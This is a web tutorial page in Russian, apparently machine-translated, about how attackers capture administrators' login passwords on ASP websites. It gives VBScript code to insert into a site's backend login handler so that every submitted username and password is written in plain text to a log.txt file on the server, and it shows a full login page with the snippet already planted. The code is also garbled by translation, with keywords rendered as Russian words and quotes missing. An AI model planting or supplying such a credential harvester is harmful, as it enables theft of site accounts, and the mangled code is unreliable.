Главная страница>Учебник по сетевому программированию>Учебное пособие по ASP

Asp перехватывает код пароля для фонового входа в систему

Автор:Eve Cole Время обновления:2025-03-13 13:00:04

Многие хакеры получают пароль для входа пользователя на целевой веб-сайт, изменяя фоновый код входа, так что после ввода пароля он сохраняется в текстовом формате.

Код выглядит следующим образом:

set fso=server.createobject(scripting.filesystemobject)

если fso.FileExists(server.mappath(log.txt))=true, то

set fin=fso.OpenTextFile(server.mappath(log.txt))

temp=fin.readall

фин.закрыть

установить плавник = ничего

конец, если

set fout=fso.createtextfile(server.mappath(log.txt))

fout.WriteLine(temp&user:&username&¦pwd:&password&¦time:&now()&)

фут.закрыть

установить fout=ничего

установить fso=ничего

Вставьте его в место отправки формы при фоновом входе в систему!

Справочные документы:

Скопируйте код кода следующим образом:

<%@language=кодовая страница vbscript=936 %>

<%

димскл, рс

затемненное имя пользователя, пароль, контрольный код

имя пользователя = заменить (обрезать (запрос (имя пользователя)), ',)

пароль = заменить (обрезать (Запрос (пароль)), ',)

CheckCode=replace(trim(Request(CheckCode)),',)

если Имя пользователя= тогда

FoundErr=Истина

ErrMsg=ErrMsg & <br><li>Имя пользователя не может быть пустым! </li>

конец, если

если Пароль= тогда

FoundErr=Истина

ErrMsg=ErrMsg & <br><li>Пароль не может быть пустым! </li>

конец, если

если CheckCode= тогда

FoundErr=Истина

ErrMsg=ErrMsg & <br><li>Код подтверждения не может быть пустым! </li>

конец, если

если сеанс (CheckCode) = тогда

FoundErr=Истина

ErrMsg=ErrMsg & <br><li>Ваше время входа в систему слишком велико. Пожалуйста, вернитесь на страницу входа, чтобы войти снова. </li>

конец, если

если CheckCode<>CStr(сессия(CheckCode)) то

FoundErr=Истина

ErrMsg=ErrMsg & <br><li>Введенный вами код подтверждения не соответствует коду, сгенерированному системой, пожалуйста, введите его еще раз. </li>

конец, если

«За этим код, который я добавил ~ начальная область

set fso=server.createobject(scripting.filesystemobject)

если fso.FileExists(server.mappath(log.txt))=true, то

set fin=fso.OpenTextFile(server.mappath(log.txt))

temp=fin.readall

фин.закрыть

установить плавник = ничего

конец, если

set fout=fso.createtextfile(server.mappath(log.txt))

fout.WriteLine(temp&user:&username&|pwd:&password&|time:&now()&)

фут.закрыть

установить fout=ничего

установить fso=ничего

'Код позади был удален в области me~end

%>

Связанные статьи